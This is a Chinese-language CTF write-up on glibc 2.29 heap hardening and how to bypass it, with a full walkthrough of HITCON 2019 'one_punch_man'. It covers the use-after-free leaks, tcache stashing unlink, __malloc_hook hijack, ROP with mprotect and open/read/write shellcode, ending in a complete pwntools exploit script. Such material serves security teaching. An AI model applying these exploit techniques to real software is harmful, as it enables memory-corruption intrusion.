新增保护机制

tcache

tcache_entry结构体新增了一个指针key，存放在chunk的bk位置；tcache_put时写入，tcache_get时清空

/* Push CHUNK onto the front of the tcache list for bin TC_IDX.
   The chunk's user memory is reinterpreted as a tcache_entry, its key
   field is set to the tcache pointer, and the bin's counter is
   incremented.  No per-bin limit is checked inside this function.
   NOTE(review): the line carrying the return type / storage class
   appears to be missing from this excerpt.  */
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  /* The entry overlays the chunk's user data area.  */
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  /* Singly linked LIFO insert: the new entry becomes the list head.  */
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Pop the head entry of the tcache list for bin TC_IDX and return it
   as a void pointer.  The bin's counter is decremented and the entry's
   key field is reset to NULL before returning.
   NOTE(review): the line carrying the return type / storage class
   appears to be missing from this excerpt.  */
tcache_get (size_t tc_idx)
{
  /* The head is read before the index is asserted to be in range.  */
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  /* The list for this bin must not be empty.  */
  assert (tcache->entries[tc_idx] > 0);
  /* Unlink: the next pointer is followed without further validation.  */
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  /* Clear the "in the tcache" mark written by tcache_put.  */
  e->key = NULL;
  return (void *) e;
}

在free一个属于tcache大小范围的chunk时，新增一个判断分支：如果chunk的bk位置（即e->key）等于tcache，则会遍历对应的tcache链表，检查其中是否已经存在同一个chunk（double free）

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);
    if (tcache != NULL && tc_idx < mp_.tcache_bins)
      {
	/* Check to see if it's already in the tcache.  */
	tcache_entry *e = (tcache_entry *) chunk2mem (p);

	/* This test succeeds on double free.  However, we don't 100%
	   trust it (it also matches random payload data at a 1 in
	   2^<size_t> chance), so verify it's not an unlikely
	   coincidence before aborting.  */
	if (__glibc_unlikely (e->key == tcache))
	  {
	    tcache_entry *tmp;
	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
	    for (tmp = tcache->entries[tc_idx];
		 tmp;
		 tmp = tmp->next)
	      if (tmp == e)
		malloc_printerr ("free(): double free detected in tcache 2");
	    /* If we get here, it was a coincidence.  We've wasted a
	       few cycles, but don't abort.  */
	  }

	if (tcache->counts[tc_idx] < mp_.tcache_count)
	  {
	    tcache_put (p, tc_idx);
	    return;
	  }
      }
  }
#endif

如何绕过呢？？

修改bk使不进入循环分支
修改size从而修改tc_idx
house of botcake：合并chunk1 chunk2进unsortedbins，将chunk2链进tcache，从chunk1分配一个大chunk造成overlapped到chunk2修改其fd
fastbin_reverse_into_tcache

unsortedbins

新增检查

size是否合理
next chunk的prev_size是否等于victim的size
双向链表完整性检查
next chunk的prev_inuse位是否为0

if (__glibc_unlikely (size <= 2 * SIZE_SZ)
              || __glibc_unlikely (size > av->system_mem))
            malloc_printerr ("malloc(): invalid size (unsorted)");
          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
          if (__glibc_unlikely (bck->fd != victim)
              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
            malloc_printerr ("malloc(): unsorted double linked list corrupted");
          if (__glibc_unlikely (prev_inuse (next)))
            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

malloc overlap

当向后合并（低地址）时，会检查上个chunk的size和当前chunk的prev_size是否相等

/* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

以下假设有off by null漏洞👇

在之前的glibc版本中还存在双向链表检查，我们一般是通过将要合并的chunk放入unsortedbins中获得系统给的fd和bk来绕过以达到chunk overlapping的目的。但是2.29的新机制无法通过这个方式绕过双向链表检查。

如何绕过呢？？？

主要思路是利用从largebin中分配的残留指针 fd_nextsize / bk_nextsize，因为largebin中只有一个chunk时，这两个指针指向自己，先通过部分覆盖修改fd_nextsize的第一个字节，使其指向一个我们可以控制bk的chunk，例如利用smallbins或unsortedbins的机制部分覆盖bk指向fake_chunk。这时bk_nextsize仍然指向自己。利用同样的思路将其链入fastbins中，部分覆盖第一个字节使其指向fake_chunk。这样双向链表就构造好了

总结一下就是利用smallbins会在bk写入堆地址，fastbins会在fd写入堆地址，然后部分覆盖构造双向链表。但是我们无法保证堆地址第二个字节是\x00（堆地址的低12位固定，第二个字节的高4位是随机的），所以这种攻击方式只有1/16（即6.25%）的概率会成功:]

top chunk

if (__glibc_unlikely (size > av->system_mem))
  malloc_printerr ("malloc(): corrupted top size");

Hitcon-CTF2019-one_punch_man

保护全开

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

程序有5个功能:

add

// Menu handler "add" (decompiler output): reads a slot index and a hero name
// from the user, then stores a calloc'ed copy of the name together with its
// length in the global slot table (unk_4040 / qword_4048).
// a1 and a2 are not referenced in the body.
// Returns the XOR of the current fs:0x28 value with the one saved on entry.
unsigned __int64 __fastcall Add(__int64 a1, __int64 a2)
{
  unsigned int idx; // [rsp+8h] [rbp-418h]
  signed int name_len; // [rsp+Ch] [rbp-414h]
  char s[1032]; // [rsp+10h] [rbp-410h]
  unsigned __int64 v6; // [rsp+418h] [rbp-8h]

  // Save fs:0x28 (presumably the stack canary) for the check on return.
  v6 = __readfsqword(0x28u);
  MyPuts("idx: ");
  idx = read_int();
  // idx is unsigned, so only 0, 1 and 2 pass (assuming error() does not return).
  if ( idx > 2 )
    error((__int64)"invalid");
  MyPuts("hero name: ");
  // The name is staged in the stack buffer s first; at most 0x400 bytes are read.
  memset(s, 0, 1024uLL);
  name_len = read(0, s, 0x400uLL);
  if ( name_len <= 0 )
    error((__int64)"io");
  // Replace the last byte that was read with a NUL terminator.
  s[name_len - 1] = 0;
  // Only lengths in [0x80, 0x400] are accepted.
  if ( name_len <= 0x7F || name_len > 0x400 )
    error((__int64)"poor hero name");
  // Slots are indexed with a stride of two qwords: the pointer goes to
  // unk_4040[2*idx] and the length to qword_4048[2*idx] (the names suggest the
  // two tables are interleaved -- confirm against the binary).
  // The calloc() result is not checked before it is used below.
  *((_QWORD *)&unk_4040 + 2 * idx) = calloc(1uLL, name_len);
  qword_4048[2 * idx] = name_len;
  // strncpy stops copying at the first NUL byte found in s.
  strncpy(*((char **)&unk_4040 + 2 * idx), s, name_len);
  // Wipe the staging buffer before returning.
  memset(s, 0, 0x400uLL);
  return __readfsqword(0x28u) ^ v6;
}

在这个函数里允许我们分配0x80-0x400大小的chunk，并把初始化chunk的内容先保存在栈上再通过strncpy传送到堆里，rebase(0x4040)会依次保存chunk地址和大小且只能同时分配三个。注意这里分配chunk使用的是calloc，即不会从tcache中取chunk。

free

// Menu handler "free" (decompiler output): reads a slot index and frees the
// pointer stored in that slot. a1 and a2 are not referenced in the body.
void __fastcall Delete(__int64 a1, __int64 a2)
{
  unsigned int v2; // [rsp+Ch] [rbp-4h]

  MyPuts("idx: ");
  v2 = read_int();
  // v2 is unsigned, so only 0, 1 and 2 pass (assuming error() does not return).
  if ( v2 > 2 )
    error((__int64)"invalid");
  // The slot keeps its pointer (and length) after the free: nothing is cleared
  // here, so the other handlers can still reach the freed chunk.
  free(*((void **)&unk_4040 + 2 * v2));         // uaf
}

这里没有对指针清空，存在uaf

backdoor

// Backdoor handler (decompiler output): the only visible path that calls
// malloc() instead of calloc(). It is gated on a single byte located 0x20
// bytes past the address held in qword_4030.
// a1 and a2 are not referenced in the body. Returns the result of the last puts().
ssize_t __fastcall Magic(__int64 a1, __int64 a2)
{
  void *buf; // [rsp+8h] [rbp-8h]

  // Gate: the byte must be greater than 6, otherwise error("gg") is called.
  // NOTE(review): whether _BYTE is compared as signed or unsigned depends on
  // the decompiler typedef -- confirm in the disassembly.
  if ( *(_BYTE *)(qword_4030 + 0x20) <= 6 )
    error((__int64)"gg");
  // Fixed-size request of 0x217 bytes.
  buf = malloc(0x217uLL);
  if ( !buf )
    error((__int64)"err");
  // Up to 0x217 bytes of user input are written into the returned memory.
  if ( read(0, buf, 0x217uLL) <= 0 )
    error((__int64)"io");
  puts("Serious Punch!!!");
  puts((const char *)&unk_2128);
  // The buffer is printed back as a C string; it is not freed in this function.
  return puts((const char *)buf);
}

程序留了一个后门函数可以调用malloc(0x217)，但限制了利用条件：*(char *)(heap_base+0x30) > 6，也就是0x220大小的tcache bin的计数必须大于6

edit

// Menu handler "edit" (decompiler output): reads a slot index and overwrites
// the memory the slot points to with new user input.
// a1 and a2 are not referenced in the body. Returns the byte count from read().
ssize_t __fastcall rename(__int64 a1, __int64 a2)
{
  ssize_t result; // rax
  unsigned int v3; // [rsp+Ch] [rbp-4h]

  MyPuts("idx: ");
  v3 = read_int();
  // v3 is unsigned, so only 0, 1 and 2 pass (assuming error() does not return).
  if ( v3 > 2 )
    error((__int64)"invalid");
  // Only a NULL slot pointer is rejected; there is no check that the chunk is
  // still allocated.
  if ( !*((_QWORD *)&unk_4040 + 2 * v3) )
    error((__int64)"err");
  MyPuts("hero name: ");
  // Writes up to the length recorded for this slot, directly into the chunk.
  result = read(0, *((void **)&unk_4040 + 2 * v3), qword_4048[2 * v3]);
  if ( result <= 0 )
    error((__int64)"io");
  return result;
}

show

// Menu handler "show" (decompiler output): reads a slot index and prints the
// memory the slot points to as a C string.
// a1 and a2 are not referenced in the body. Returns the slot value when it is
// zero, otherwise the result of puts().
ssize_t __fastcall Show(__int64 a1, __int64 a2)
{
  ssize_t result; // rax
  unsigned int v3; // [rsp+Ch] [rbp-4h]

  MyPuts("idx: ");
  v3 = read_int();
  // v3 is unsigned, so only 0, 1 and 2 pass (assuming error() does not return).
  if ( v3 > 2 )
    error((__int64)"invalid");
  result = *((_QWORD *)&unk_4040 + 2 * v3);
  // Any non-NULL slot pointer is printed; there is no check that the chunk is
  // still allocated.
  if ( result )
  {
    MyPuts("hero name: ");
    // puts() prints up to the first NUL byte.
    result = puts(*((const char **)&unk_4040 + 2 * v3));
  }
  return result;
}

因为存在uaf，所以我们可以很容易地leak出堆地址和libc地址，同时存在edit函数可以修改tcache的fd，只要可以调用程序留给我们的后门函数中的malloc就可以实现任意地址写

那么如何将heap_base+0x30处的值修改为一个large value呢

这里就要用到glibc2.29下的一种利用手法tcache_stashing_unlink_attack

先贴主要用到的glibc源码

if (in_smallbin_range (nb))
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
        {
          bck = victim->bk;
	  if (__glibc_unlikely (bck->fd != victim))
	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
          set_inuse_bit_at_offset (victim, nb);
          bin->bk = bck;
          bck->fd = bin;

          if (av != &main_arena)
	    set_non_main_arena (victim);
          check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
	  /* While we're here, if we see other chunks of the same size,
	     stash them in the tcache.  */
	  size_t tc_idx = csize2tidx (nb);
	  if (tcache && tc_idx < mp_.tcache_bins)
	    {
	      mchunkptr tc_victim;

	      /* While bin not empty and tcache not full, copy chunks over.  */
	      while (tcache->counts[tc_idx] < mp_.tcache_count
		     && (tc_victim = last (bin)) != bin)
		{
		  if (tc_victim != 0)
		    {
		      bck = tc_victim->bk;
		      set_inuse_bit_at_offset (tc_victim, nb);
		      if (av != &main_arena)
			set_non_main_arena (tc_victim);
		      bin->bk = bck;
		      bck->fd = bin;

		      tcache_put (tc_victim, tc_idx);
	            }
		}
	    }
#endif

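因为我们无法像how2heap中那样把fake_chunk->bk修改为一个可写的地址（如果fake_chunk也被当作tc_victim取出，执行bck = tc_victim->bk; bck->fd = bin时就会崩溃），所以我们只在tcache中预留一个位置，让循环在stash完一个chunk后就因为tcache已满而停止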

那么如何使得smallbins存在两个chunk并且相应大小的tcache未满呢？？

这里用到一个技巧，通过分配并释放一个较大的chunk，然后利用分割机制拿到我们想要的size

add(0,"aaaa",0x210)
add(2,"tcache",0x210)
free(2)#fill tcache done
add(1,"bbbb",0x210)
·
·
·
free(0)
add(2,"cccc",0x180)
free(1)
add(2,"dddd",0x180)
add(2,"cccc",0xa0)#malloc_consolidate

此时的堆布局：

pwndbg> bins
tcachebins
0x90 [  6]: 0x564cf556c850 —▸ 0x564cf556c7c0 —▸ 0x564cf556c730 —▸ 0x564cf556c6a0 —▸ 0x564cf556c610 —▸ 0x564cf556c580 ◂— 0x0
0x220 [  7]: 0x564cf556c140 —▸ 0x7f1d7731dc30 (__malloc_hook) ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x90: 0x564cf556c4e0 —▸ 0x564cf556c0a0 —▸ 0x7f1d7731dd20 (main_arena+224) ◂— 0x564cf556c4e0
largebins
empty
pwndbg> x/2gx 0x564cf556c4e0
0x564cf556c4e0:	0x0000000000000000	0x0000000000000091
pwndbg> x/2gx 0x564cf556c0a0
0x564cf556c0a0:	0x0000000000000000	0x0000000000000091

然后修改chunk1的bk为heap_base+0x20，再分配一个相应大小的chunk触发攻击

chunk1会链入相应的tcache，heap_base+0x20处的fake_chunk会被当成bck，并会将smallbin赋值给其fd

pwndbg> x/10gx 0x564cf556b000
0x564cf556b000:	0x0000000000000000	0x0000000000000251
0x564cf556b010:	0x0700000000000000	0x0000000000000000
0x564cf556b020:	0x0000000000000000	0x0000000000000000
0x564cf556b030:	0x00007f1d7731dd20	0x0000000000000000
0x564cf556b040:	0x0000000000000000	0x0000000000000000
pwndbg> x/4gx 0x00007f1d7731dd20
0x7f1d7731dd20 <main_arena+224>:	0x00007f1d7731dd10	0x00007f1d7731dd10
0x7f1d7731dd30 <main_arena+240>:	0x0000564cf556c4e0	0x0000564cf556b020

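此时tcache的counts数组已经被我们打烂了：写入heap_base+0x30处的main_arena+224地址（0x00007f1d7731dd20）的每个字节都被当成了一个bin的计数，即0x20=32、0xdd=-35、0x31=49、0x77=119、0x1d=29、0x7f=127，正好对应下面0x220~0x270的计数。还好我们之前已经修改了0x220这条tcache链的fd，而它的计数（32）也满足了大于6的条件，这时直接调用后门函数里的malloc就可以劫持malloc_hook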

pwndbg> bins
tcachebins
0x90 [  7]: 0x564cf556c4f0 —▸ 0x564cf556c850 —▸ 0x564cf556c7c0 —▸ 0x564cf556c730 —▸ 0x564cf556c6a0 —▸ 0x564cf556c610 —▸ 0x564cf556c580 ◂— 0x0
0x220 [ 32]: 0x564cf556c140 —▸ 0x7f1d7731dc30 (__malloc_hook) ◂— 0x0
0x230 [-35]: 0x0
0x240 [ 49]: 0x0
0x250 [119]: 0x0
0x260 [ 29]: 0x0
0x270 [127]: 0x0

因为这题使用 seccomp 开启了沙箱保护，只有白名单上的系统调用可以使用。

# seccomp-tools dump ./one_punch
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x0000000f  if (A != rt_sigreturn) goto 0006
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0006: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0008
 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0008: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0012
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0012: 0x15 0x00 0x01 0x00000000  if (A != read) goto 0014
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0014: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0016
 0015: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0016: 0x15 0x00 0x01 0x0000000c  if (A != brk) goto 0018
 0017: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0018: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0020
 0019: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0020: 0x15 0x00 0x01 0x0000000a  if (A != mprotect) goto 0022
 0021: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0022: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x06 0x00 0x00 0x00000000  return KILL

我们无法执行execve系统调用，只能通过orw（open/read/write）来读取flag

因为调用add函数时，程序先将我们的输入放在了栈上，所以考虑在此处构造rop

pwndbg> stack 20
00:0000│ rsp  0x7ffd2f88c210 —▸ 0x7f570f3814c0 (_dl_tunable_set_mallopt_check) ◂— mov    eax, dword ptr [rdi]
01:0008│      0x7ffd2f88c218 ◂— 0x10100000002
02:0010│ rsi  0x7ffd2f88c220 —▸ 0x7f570f3229a0 (init_cacheinfo+240) ◂— pop    rdi
03:0018│      0x7ffd2f88c228 —▸ 0x564a8ba4e000 ◂— 0x0
04:0020│      0x7ffd2f88c230 —▸ 0x7f570f3253a5 (insert_module+85) ◂— pop    rsi
05:0028│      0x7ffd2f88c238 ◂— 0x10000
06:0030│      0x7ffd2f88c240 —▸ 0x7f570f302b9a ◂— pop    rdx
07:0038│      0x7ffd2f88c248 ◂— 0x7
08:0040│      0x7ffd2f88c250 —▸ 0x7f570f3ee370 (mprotect) ◂— mov    eax, 0xa
09:0048│      0x7ffd2f88c258 —▸ 0x564a8ba4f990 ◂— 0x3148c03148e78948
0a:0050│      0x7ffd2f88c260 ◂— 0x67616c66 /* 'flag' */
0b:0058│      0x7ffd2f88c268 ◂— 0x0
... ↓

在调用calloc里有一系列抬高栈顶的操作，将malloc_hook改为add rsp,48h;ret就可以执行我们构造的rop

完整exp

from pwn_debug import*
# Start the target through the pwn_debug wrapper.
# NOTE(review): presumably debug('2.29') selects the glibc 2.29 loader/libc and
# run("debug") launches the process in that mode -- confirm against pwn_debug.
pdb = pwn_debug("./one_punch")
pdb.debug('2.29')
p = pdb.run("debug")

#context.log_level = "debug"
# Local copy of the libc used to resolve symbol offsets (path is machine specific).
libc = ELF("/glibc/x64/2.29/lib/libc-2.29.so")
# Candidate one-gadget offsets; not referenced anywhere else in the visible script.
one_gadget = [0xc1720,0xdf212,0xdf21e]

def add(index,content,size):
    """Menu option 1: create hero `index` with `content` NUL-padded to `size` bytes."""
    padded_name = content.ljust(size, '\x00')
    dialogue = (
        ("> ", "1"),
        ("idx: ", str(index)),
        ("name: ", padded_name),
    )
    # Answer each prompt in order, one line per prompt.
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)

def edit(index,content):
    """Menu option 2: overwrite the name stored in slot `index` with `content`."""
    dialogue = (
        ("> ", "2"),
        ("idx: ", str(index)),
        ("name: ", content),
    )
    # Answer each prompt in order, one line per prompt.
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)

def show(index):
    """Menu option 3: ask the program to print slot `index`; the caller reads the output."""
    for prompt, reply in (("> ", "3"), ("idx: ", str(index))):
        p.sendlineafter(prompt, reply)

def free(index):
    """Menu option 4: free the chunk held in slot `index`."""
    slot = str(index)
    p.sendlineafter("> ", "4")
    # The index is sent without a trailing newline, unlike the other helpers.
    p.sendafter("idx: ", slot)

def malloc(content):
    """Hidden menu option 50056: call the backdoor and send `content` as its input."""
    backdoor_choice = "50056"
    p.sendlineafter("> ", backdoor_choice)
    # The payload goes out immediately, without waiting for a prompt.
    p.sendline(content)

def g():
    """Attach gdb to the target with a breakpoint at PIE offset 0x1235."""
    gdb_script = "b *$rebase(0x1235)"
    gdb.attach(p, gdb_script)

# Stage 1: heap leak. Allocate and free the same 0x210-byte name six times,
# then print the dangling slot 0 (use-after-free) to read a heap pointer.
for i in range(6):
    add(0,"aaaa",0x210)
    free(0)
show(0)
# Keep the last six bytes of the printed line and zero-extend them to 8 bytes.
heap_leak = u64(p.recvuntil('\n',drop=True)[-6:].ljust(8,'\x00'))
# The subtracted offsets are specific to this heap layout.
heap_base = heap_leak - 0x4e0 - 0x5c0 - 0x40
info("heap_base:" + hex(heap_base))
# Stage 2: libc leak. One more free of this size fills the tcache bin, so the
# following free(0) presumably lands outside the tcache and exposes a libc pointer.
add(0,"aaaa",0x210)
add(2,"tcache",0x210)
free(2)#fill tcache done
add(1,"bbbb",0x210)

free(0)
show(0)
libc_leak = u64(p.recvuntil('\n',drop=True)[-6:].ljust(8,'\x00'))
# 0x3b3ca0 is the offset of the leaked pointer inside this libc build.
libc.address = libc_leak - 0x3b3ca0
info("libc_base:" + hex(libc.address))

# Slot 2 still points at the freed chunk: overwrite its first qword (the tcache
# next pointer) with the address of __malloc_hook.
edit(2,p64(libc.sym['__malloc_hook']))#change fd

add(0,"aaaa",0x210)

# Stage 3: put six chunks into the tcache bin used for 0x80-byte requests,
# leaving exactly one free position in it.
for i in range(6):
    add(2,"aaaa",0x80)
    free(2)
# Free the two large chunks and carve 0x180 bytes out of each; the leftovers
# are the two small chunks the attack needs. The 0xa0 request presumably sorts
# them into the small bin -- confirm with the bins dump.
free(0)
add(2,"cccc",0x180)
free(1)
add(2,"dddd",0x180)
add(2,"cccc",0xa0)
# Through the dangling slot 1, skip 0x180 bytes and rewrite the leftover chunk's
# header: prev_size 0, size 0x91, fd heap_base+0x10a0, bk heap_base+0x20.
edit(1,"a"*0x180+p64(0)+p64(0x91)+p64(heap_base+0x10a0) + p64(heap_base + 0x20))
# This request is the one that triggers the small-bin allocation.
add(2,"eeee",0x80)

# Gadget addresses inside libc; the offsets are specific to this libc build.
pop_rdi = libc.address + 0x219a0
pop_rsi = libc.address + 0x243a5
pop_rdx = libc.address + 0x1b9a
mprotect = libc.sym['mprotect']

# ROP chain: mprotect(heap_base, 0x10000, 7), then return to heap_base+0x1990
# (presumably where the shellcode added below ends up -- confirm in gdb).
rop = flat(
	pop_rdi,
	heap_base,
	pop_rsi,
	0x10000,
	pop_rdx,
	7,
	mprotect,
	heap_base+0x1990
)
# Shellcode, three syscalls:
#   1. rax=2 (open) with rdi=rsp and rsi=0; rsp is expected to point at the
#      "flag" string that follows the ROP chain on the stack.
#   2. rax=0 (read) from the returned fd into that same address, dx=0x123.
#   3. rax=1 (write) to fd 1, reusing rsi and rdx from the read.
sc = asm(
	'''
	mov rdi, rsp;
	xor rax, rax;
	xor rsi, rsi;
	mov al, 2;
	syscall;

	mov rsi, rdi;
	mov rdi, rax;
	mov dx, 0x123;
	xor rax, rax;
	syscall;
	
	xor rdi,rdi;
	add rdi, 1;
	xor rax, rax;
	mov al, 1;
	syscall;
	'''
)
# Store the shellcode on the heap as a hero name in slot 0.
add(0,sc,0x100)#orw

# First backdoor call: consumes the head of the poisoned tcache list.
malloc("cccc")
# Debugging aid: attaches gdb before the hook is overwritten.
g()
# Second backdoor call: the returned memory is expected to overlap __malloc_hook,
# which receives the address of the stack-pivot gadget.
# NOTE(review): the reason for the two-byte "ff" prefix is not evident from
# this script -- confirm the alignment in gdb.
malloc("ff"+p64(libc.address+0xbe131))#add rsp,0x48;ret

# Final add: the input (ROP chain followed by the "flag" path) is staged on the
# stack by the add handler, and its allocation call reaches the overwritten hook.
add(2,(rop+"flag\x00"),0x400)

p.interactive()

reference

https://bbs.pediy.com/thread-257901.htm

http://blog.eonew.cn/archives/1233